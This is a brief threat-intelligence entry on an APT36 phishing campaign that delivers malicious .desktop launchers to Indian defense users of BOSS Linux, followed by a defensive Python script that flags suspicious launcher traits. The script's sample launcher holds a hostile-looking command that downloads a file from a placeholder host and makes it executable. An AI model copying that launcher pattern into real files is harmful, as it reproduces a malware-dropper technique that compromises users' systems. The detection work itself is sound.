Intel Name: Phishing attack: deploying malware on Indian defense BOSS Linux
Date of Scan: July 7, 2025
Impact: High
Summary:
Our team uncovered a cyber-espionage campaign by APT36 (Transparent Tribe), targeting Indian defense personnel. In a tactical shift, the group now focuses on Linux systems, especially BOSS Linux used by Indian government agencies. Phishing emails deliver a ZIP file containing a malicious .desktop shortcut that executes on user interaction. It opens a decoy PowerPoint file while silently downloading and running a malicious ELF payload to compromise the system.
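A defender-side triage check for the delivery mechanism described in the summary, as an added example that is not part of the original report: it parses a .desktop file's [Desktop Entry] group and flags launcher traits consistent with that description. The rule set, tag names, sample files and the example.invalid URL are constructed assumptions, not indicators from the campaign.

```python
import re

# Heuristics below are illustrative assumptions, not indicators from the report.
EXEC_RULES = [
    ("exec-via-shell", re.compile(r"(?:^|[\s/])(?:sh|bash|dash)\s+-c\b")),
    ("network-fetch", re.compile(r"\b(?:curl|wget)\b")),
    ("marks-file-executable", re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]?7[0-7]{2})\b")),
    ("command-chain", re.compile(r";|&&|\|")),
]
# A launcher whose display name ends in a document extension is masquerading.
DOC_NAME = re.compile(r"\.(?:pptx?|pdf|docx?|xlsx?)$", re.IGNORECASE)


def parse_desktop_entry(text):
    """Parse the [Desktop Entry] group into a dict (last duplicate key wins)."""
    group, entry = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
        elif group == "Desktop Entry" and "=" in line:
            key, _, value = line.partition("=")  # split on the first '=' only
            entry[key.strip()] = value.strip()
    return entry


def triage(text):
    """Return finding tags for one .desktop file's contents (empty list = clean)."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    findings = [tag for tag, rx in EXEC_RULES if rx.search(exec_line)]
    if DOC_NAME.search(entry.get("Name", "")):
        findings.append("name-mimics-document")
    return findings


# Constructed samples for illustration only.
SUSPICIOUS = """[Desktop Entry]
Type=Application
Name=Briefing.pptx
Exec=sh -c "xdg-open /tmp/brief.pptx; curl -o /tmp/f https://example.invalid/f; chmod +x /tmp/f"
Terminal=false
"""
BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\n"

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, triage(sample))
```

Run it over .desktop files extracted from mail attachments or found in user download directories; any single tag is weak on its own, so treat a combination of tags as the signal worth escalating.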